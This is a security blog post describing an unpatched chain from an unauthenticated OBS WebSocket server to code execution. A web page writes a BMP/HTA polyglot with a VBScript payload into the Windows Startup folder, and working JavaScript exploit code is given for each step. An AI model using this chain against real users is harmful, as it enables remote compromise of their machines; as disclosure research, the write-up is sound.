OBS WebSocket to RCE | Jorian Woltjer

One day while playing around with the settings in OBS (Open Broadcaster Software), an open-source desktop recording/live streaming program, I noticed an interesting feature called WebSocket Server. This raised my eyebrows with suspicion, and sure enough, it was accessible from the browser and could lead to RCE through some image and file format wizardry.

This "vulnerability" is not going to be fixed; it is more an abuse of the available features. While I think there is a simple fix, I have not received any reply from the OBS maintainers' security contact in 3 months. At this point, I think the technique is interesting enough to warrant a blog post, as it may help exploit many more issues on Windows.

WebSockets & Auth

As the name suggests, the WebSocket Server uses pigeons to... just kidding, of course, it uses WebSockets. These are made for, well, the Web, often used in the browser to have a two-way communication channel with the server. OBS uses this to let simple programs on your computer interact with scenes, layers, and other things. Below is the default, safe, configuration:

Configuration screen for WebSocket server in OBS with authentication enabled

Notice the ☑️ checked box before Enable Authentication. This checkbox does a lot of heavy lifting: a randomly generated password under Server Password is then required by any program that wants to connect to OBS. This is securely implemented with a challenge-response mechanism.
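
To make that challenge-response step concrete, here is a minimal Node.js sketch of how a client derives its authentication string in the obs-websocket 5.x protocol, as I understand it from the protocol documentation: hash the password with the server's salt, then hash that result with the per-connection challenge. The function names and the example values are hypothetical, and obs-websocket-js already does this for you.

```javascript
// Sketch of the obs-websocket 5.x authentication string (Node.js).
const { createHash } = require("node:crypto");

// Base64-encoded SHA-256 digest of a UTF-8 string.
function sha256Base64(text) {
  return createHash("sha256").update(text, "utf8").digest("base64");
}

// `salt` and `challenge` are sent by the server when a client connects.
function computeAuthString(password, salt, challenge) {
  const secret = sha256Base64(password + salt); // step 1: bind the password to the salt
  return sha256Base64(secret + challenge); // step 2: bind the secret to this connection
}

// Hypothetical values, for illustration only.
const auth = computeAuthString("correct horse", "c2FsdA==", "Y2hhbGxlbmdl");
console.log(auth.length); // 44 (a 32-byte digest in padded base64)
```

The password itself never crosses the wire, and because the challenge changes per connection, a captured authentication string cannot simply be replayed.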

You can, however, choose not to use authentication, or set a custom but simpler password. Doing this or leaking the password somewhere is problematic because an attacker may now be able to impersonate a legitimate client, and interact with OBS.

Connecting from the Browser

Let's say for simplicity that you completely disable authentication, it's only one click away after all, and makes implementing that cool script of yours much easier. You decide to browse the web a little with OBS in the background and suddenly encounter a website by some malicious actor. What can they do?

Because the protocol is simply WebSockets, it is intentionally accessible from anywhere in the browser. Using the obs-websocket-js library to spare you some implementation troubles, you can connect to localhost:4455:

<script src="https://cdn.jsdelivr.net/npm/obs-websocket-js"></script>
<script>
  let obs;
  (async () => {
    obs = new OBSWebSocket();
    await obs.connect("ws://localhost:4455");
  })();
</script>

Via the obs interface we can now send commands and receive responses from the server with obs.call(). These are all documented in the "Requests" section of the documentation. There are over 100 of them that we are now able to call however we want. This ranges from messing with the stream's settings to adding elements and scenes. But can we achieve more?
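
Under the hood, obs.call() wraps each request in a small JSON message. The sketch below shows roughly what goes over the wire, assuming the obs-websocket 5.x message format (opcode 6 for a request, opcode 7 for its response). The helper names and the counter-based request ID are my own, not part of the library.

```javascript
// obs-websocket 5.x opcodes for requests and their responses.
const OP_REQUEST = 6;
const OP_REQUEST_RESPONSE = 7;

let nextRequestId = 0; // hypothetical ID scheme; any unique string works

// Build the JSON frame a client sends for one request.
function buildRequestFrame(requestType, requestData) {
  const d = { requestType, requestId: String(nextRequestId++) };
  if (requestData !== undefined) d.requestData = requestData;
  return JSON.stringify({ op: OP_REQUEST, d });
}

// Parse a raw frame; returns null for anything that is not a request response.
function parseResponseFrame(raw) {
  const { op, d } = JSON.parse(raw);
  if (op !== OP_REQUEST_RESPONSE) return null; // e.g. an event
  return { requestId: d.requestId, ok: d.requestStatus.result, data: d.responseData };
}

const frame = buildRequestFrame("GetVersion");
console.log(frame); // {"op":6,"d":{"requestType":"GetVersion","requestId":"0"}}
```

The requestId is what lets a client match each response to the call that triggered it, since responses and events share the same socket.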

File Write polyglot to RCE

One request that stands out is SaveSourceScreenshot. It takes a sourceName, an imageFormat, and an imageFilePath, which is the path the screenshot is saved to. The example (C:\Users\user\Desktop\screenshot.png) shows that it should be an absolute path to anywhere on the system. This is starting to sound dangerous.

Let's try calling it to see what happens. The documentation tells us to "Use GetVersion to get compatible image formats" first, so that's step one:

> (await obs.call("GetVersion")).supportedImageFormats
< ['bmp', 'cur', 'icns', 'ico', 'jpeg', 'jpg', 'pbm', 'pgm', 'png', 'ppm', 'tif', 'tiff', 'wbmp', 'webp', 'xbm', 'xpm']

There are plenty of formats to choose from; we'll start with png, the one also used in the example. We can now call something like the following with the name of an existing source (a scene works too) to save a screenshot of it to the desktop:

await obs.call("SaveSourceScreenshot", {
  sourceName: "some-source",
  imageFilePath: "C:\\Users\\Jorian\\Desktop\\test.png",
  imageFormat: "png",
});

Image of source text on desktop after calling

This worked nicely, but can we also give it a more malicious extension than .png, such as .exe?
We sure can! But Windows doesn't like an EXE with the content of a PNG.

Error message from Windows after opening .exe

If we look at the file contents, it is still a regular PNG, just with a different extension. This format must come from imageFormat of which we have plenty.

$ file test.exe
test.exe: PNG image data, 1266 x 264, 8-bit/color RGBA, non-interlaced

The bytes in this file are not something we chose, though. Would there really be a way to make an executable that's at the same time an image? We can look at the file format posters by Ange Albertini, but we are pretty limited because OBS itself generates the image file. We only control the pixels that go into the resulting file, and almost all modern image formats use compression, making the output very hard to control arbitrarily. Not to mention that most files require magic bytes to be recognized, and the start of the file will always be taken up by the image metadata.

This time, luckily there is an old leftover format that nobody uses these days but is perfect for controlling the data: BMP. The Bitmap file format is a very simple one, especially its "pixel array" variant which OBS uses when you save an image as bmp, as it uses no compression.

Binary poster by Ange Albertini of the BMP 3 file format

As you can see above, it stores BGR values one by one as separate bytes. If the first pixel is colored #726f4a and the second pixel #6e6169, their BGR values will turn into the bytes 4a 6f 72 69 61 6e, or "Jorian". This allows us to write arbitrary data starting around 60 bytes into the file; before that, there is still some annoying metadata.
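
The byte-to-color mapping is easy to check in code. This small sketch (the function name is made up for illustration) packs every three bytes of a string into one #rrggbb color so that a BGR writer emits them in the original order; a final partial pixel is padded with zero bytes.

```javascript
// Map each group of three bytes to one pixel color, which BMP stores as B, G, R.
function bytesToHexColors(text) {
  const bytes = new TextEncoder().encode(text);
  const colors = [];
  for (let i = 0; i < bytes.length; i += 3) {
    const b = bytes[i];
    const g = bytes[i + 1] ?? 0; // pad a trailing partial pixel with zeros
    const r = bytes[i + 2] ?? 0;
    const hex = [r, g, b].map((v) => v.toString(16).padStart(2, "0")).join("");
    colors.push(`#${hex}`);
  }
  return colors;
}

console.log(bytesToHexColors("Jorian")); // [ '#726f4a', '#6e6169' ]
```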

On Linux, this would already be enough to cause quite some impact by overwriting ~/.ssh/authorized_keys, some bash scripts, or even libraries. On Windows, there is unfortunately much less to find online. We have to come up with a solution ourselves. With standard formats like .exe, there is no chance of such a polyglot ever happening. Our best bet may be to find some obscure configuration file to overwrite?

My mind got fixated on the startup folder though, it's just right there for us to place a malicious payload in that will be executed whenever the computer starts up. Any file with any extension in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup will be run with the default program. What are our options?

Binary formats are pretty quickly out of the picture, and scripting languages like VBS won't be able to handle the special characters in the metadata, they will error out before doing anything useful. Other existing formats parse backward where the header doesn't matter, like ZIP (of which I actually received a real life binary poster from Ange after I told him this story in person at CCC :D). These don't happen to have any security impact if forcefully opened at startup, though.

At one point I vaguely remembered seeing some malware written using an HTML-like format with malicious scripts. After a lot of searching, I found it again, .hta (HTML Application). The file content looks something like this:

<HTML>
<BODY>
<H1>Hello, world!</H1>
</BODY>
</HTML>

And looking for malicious uses of it, you can quickly find how using a <script> tag, it can run arbitrary shell commands:

<script language="VBScript">
  Set shell = CreateObject("wscript.Shell")
  shell.run "calc"
</script>

The beautiful thing about this format is that its parsing is as lax as regular HTML, so random bytes before and after are just seen as text! The parser only cares about tags like <script>...</script> embedded inside the content, whose content will be executed as VBScript. Let's make an example with some garbage content around it that still executes the calculator, before quickly closing itself. We'll name the file payload.hta:

BMP!#? aG93IHlvdSBkb2luZz8
*()(**!^#@!)AAAAAAAAAAAAAA
<script language="VBScript">
  Set shell = CreateObject("wscript.Shell")
  shell.run "calc"
  Window.Close
</script>
0123?$$$

Running this file automatically opens it with "Microsoft HTML Application host", whatever that may be, but the important part is that it successfully executes our payload, opening the calculator!

That means all we have to do is embed this string somewhere in our BMP data as blue, green, and red pixels, which we then save to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\payload.hta. The moment the user restarts their computer, our payload will execute.
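
To convince yourself the text survives intact, you can build such a BMP by hand. This is a sketch under the assumption of a plain 54-byte header (a 14-byte file header plus a 40-byte BITMAPINFOHEADER), 24 bits per pixel, and a single row; the file OBS actually writes may carry a slightly different header. The function name and the harmless sample markup are only for illustration.

```javascript
// Build an uncompressed 24-bit, one-row BMP whose pixel bytes are `payload`.
function buildOneRowBmp(payload) {
  const data = new TextEncoder().encode(payload);
  const width = Math.ceil(data.length / 3); // 3 bytes (B, G, R) per pixel
  const rowSize = Math.ceil((width * 3) / 4) * 4; // rows are padded to 4 bytes
  const HEADER_SIZE = 14 + 40; // file header + BITMAPINFOHEADER (assumed)
  const file = new Uint8Array(HEADER_SIZE + rowSize);
  const view = new DataView(file.buffer);

  file.set([0x42, 0x4d], 0); // "BM" magic bytes
  view.setUint32(2, file.length, true); // total file size
  view.setUint32(10, HEADER_SIZE, true); // offset of the pixel array
  view.setUint32(14, 40, true); // info header size
  view.setInt32(18, width, true); // width in pixels
  view.setInt32(22, 1, true); // height in pixels
  view.setUint16(26, 1, true); // color planes
  view.setUint16(28, 24, true); // bits per pixel
  view.setUint32(34, rowSize, true); // size of the pixel array
  file.set(data, HEADER_SIZE); // payload bytes become pixels
  return file;
}

const bmp = buildOneRowBmp("<H1>Hello, world!</H1>");
const asText = String.fromCharCode(...bmp);
console.log(asText.indexOf("<H1>")); // 54
```

Everything before offset 54 is header noise that a lax HTML parser treats as text, and everything from there on is exactly the string we supplied, followed by zero padding.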

We have this nice theory about writing an image with specific pixels, but we still need to gain control over that image data. The WebSocket API makes it possible to screenshot a source. A source is just one element in a scene, and we can create such elements ourselves. There are loads of options but an easy one to get the most control is a browser source (CreateInput), which literally renders HTML. This allows us to render a base64 image with the exact pixels we need.

Here's an implementation in JavaScript that converts the string into bytes, into pixels, and then into a base64 data: image URL. This is sent to OBS as a browser source with a URL being another data: URL, this time of type text/html, returning just an image with the pixel data.

const payload = `\
<script language="VBScript">
  Set shell = CreateObject("wscript.Shell")
  shell.run "calc"
  Window.Close
<\/script>`;
const bytes = new TextEncoder().encode(payload);
// Generate an image with the required pixels
const pixels = [];
for (let i = 0; i < bytes.length; i += 3) {
  const b = bytes[i] || 0;
  const g = bytes[i + 1] || 0;
  const r = bytes[i + 2] || 0;
  pixels.push(`rgb(${r}, ${g}, ${b})`);
}
const canvas = document.createElement("canvas");
canvas.width = pixels.length;
canvas.height = 1;
const context = canvas.getContext("2d");
for (let c = 0; c < canvas.width; c++) {
  context.fillStyle = pixels[c];
  context.fillRect(c, 0, 1, 1);
}
const imgUrl = canvas.toDataURL("image/png");
// Create browser source with image pixels
await obs.call("CreateInput", {
  sceneName: "some-scene",
  inputName: "hacker-source",
  inputKind: "browser_source",
  inputSettings: { url: `data:text/html,<img src="${imgUrl}" />`, width: pixels.length, height: 1 },
});

We then call SaveSourceScreenshot on the created source to save it to the startup folder:

await obs.call("SaveSourceScreenshot", {
  sourceName: "hacker-source",
  imageFilePath: "C:\\Users\\Jorian\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.hta",
  imageFormat: "bmp",
});

Checking out our startup folder, sure enough, the file was created:

Hexdump of file showing HTA script tag, and image being some pixels

It has the content we expect from our carefully crafted pixels, and double-clicking it will now open the calculator. So will restarting!

Final Exploit

I glossed over one detail: getting the path to the startup folder. Here I wrote to C:\Users\Jorian because I know my own name, but we can't assume that for any random user on our website who we want to exploit. We have a lot of APIs still available, though; surely one makes it possible to leak the username, right?

Well, there's no easy GetUsername command unfortunately, but we got the next best thing: GetRecordDirectory. This is useful because the default record directory is in the user's home folder! We can simply request it and parse out the username from the path.

const { recordDirectory } = await obs.call("GetRecordDirectory");
console.log("Record directory:", recordDirectory);  // 'C:\\Users\\Jorian\\Videos'
const username = recordDirectory.replaceAll("\\", "/").match(/\/Users\/([^\/]+)\//)[1];
console.log("Username:", username);  // 'Jorian'
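
Turning that directory into the full target path could look like the sketch below. It assumes the profile lives under <drive>:\Users\<name> and that %APPDATA% is in its default location; the helper name is hypothetical, and it returns null rather than throwing when the record directory was moved elsewhere.

```javascript
// Derive the Startup folder path from a record directory.
// Returns null when the directory is not inside <drive>:\Users\<name>\.
function startupPathFromRecordDirectory(recordDirectory, fileName) {
  const match = recordDirectory.match(/^([A-Za-z]:)[\\\/]Users[\\\/]([^\\\/]+)[\\\/]/);
  if (!match) return null; // e.g. recordings stored on another drive
  const [, drive, username] = match;
  return [
    drive, "Users", username, "AppData", "Roaming", "Microsoft", "Windows",
    "Start Menu", "Programs", "Startup", fileName,
  ].join("\\");
}

console.log(startupPathFromRecordDirectory("C:\\Users\\Jorian\\Videos", "payload.hta"));
// C:\Users\Jorian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.hta
```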

We also hardcoded the sceneName earlier to a scene created manually, but we cannot assume a scene named "some-scene" exists on any target. Therefore, we should call GetCurrentProgramScene to receive the current scene name and add a source to that. To clean up after the fact, RemoveInput can remove our created browser source.

const { currentProgramSceneName } = await obs.call("GetCurrentProgramScene");
console.log(currentProgramSceneName);  // 'My Scene'
...
await obs.call("RemoveInput", {
  inputName: "hacker-source",
});

Altogether, we now have a script that:

Connects to ws://localhost:4455 to control OBS, first fetching the record directory to extract the Windows username and current scene name
Generates an image with blue, green, and red pixels with data from a VBScript payload
Creates a browser source that displays the image using a data: URL
Writes the loaded source to the user's startup folder as an HTA file
Cleans itself up, leaving no trace but the payload that executes once the user restarts

The following gist combines all this logic into one:

https://gist.github.com/JorianWoltjer/342149caf21819499cb8cfea947d18c4

Running it, you can see the WebSocket messages quickly going back and forth in the console, and maybe even some temporary elements being created in your current OBS scene.

Browser console showing logging output and websocket messages

After restarting, the payload triggers and we see that classic calculator pop up:

Calculator open over insecure OBS configuration

We successfully exploited an RCE that normally sits behind authentication, where the user is one click away from misconfiguring it (disabling authentication). If you're a developer using the WebSocket API, make sure to set a randomly generated password and don't take shortcuts. Tell your users to do the same.
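
If you need to generate such a password yourself, something along these lines works in Node.js. It is only a sketch: the function name and the 24-byte default are my choices, not anything OBS prescribes.

```javascript
const { randomBytes } = require("node:crypto");

// Generate a URL-safe password from `byteLength` bytes of OS randomness.
function generatePassword(byteLength = 24) {
  return randomBytes(byteLength).toString("base64url");
}

const password = generatePassword();
console.log(password.length); // 32
```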

It's always a battle of usability and security. I have of course reported this in an issue and later directly to the maintainers, but with no real response. If you like these client-side RCEs, I would like to shout out Bálint who has a stunning-looking blog with some similarly cool vulnerabilities. Otherwise, go find some stuff like this on your own, it's very fun exploring the ways you can hack yourself!